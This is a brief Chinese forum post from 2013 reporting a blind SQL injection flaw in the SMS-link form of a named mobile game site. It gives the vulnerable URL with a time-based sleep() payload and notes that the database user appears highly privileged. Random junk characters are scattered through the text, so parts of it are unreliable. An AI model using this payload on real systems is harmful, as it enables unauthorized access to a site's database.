简要描述:5 Q; j& o% `5 o- M6 l3 d8 t
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。0 r2 F. ]6 d! s9 f) f$ |6 u
7 M. u0 i% s. G0 V+ B, @' D( c
详细说明:
" h# S" u6 a o) t% n4 n. G存在SQL盲注url:. \% W9 X4 }- ^
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=10 Z( A2 m: R( T2 ~+ C% @) c+ o" O9 ?5 l
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
1 d5 u2 [# x1 Fhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
8 N1 `0 L- V' ]( W$ \; g7 Khttp://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
9 M: D. L1 d% V* j3 q" Y7 s1 O/ f3 A& o1 `: Q8 h1 V- `
能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对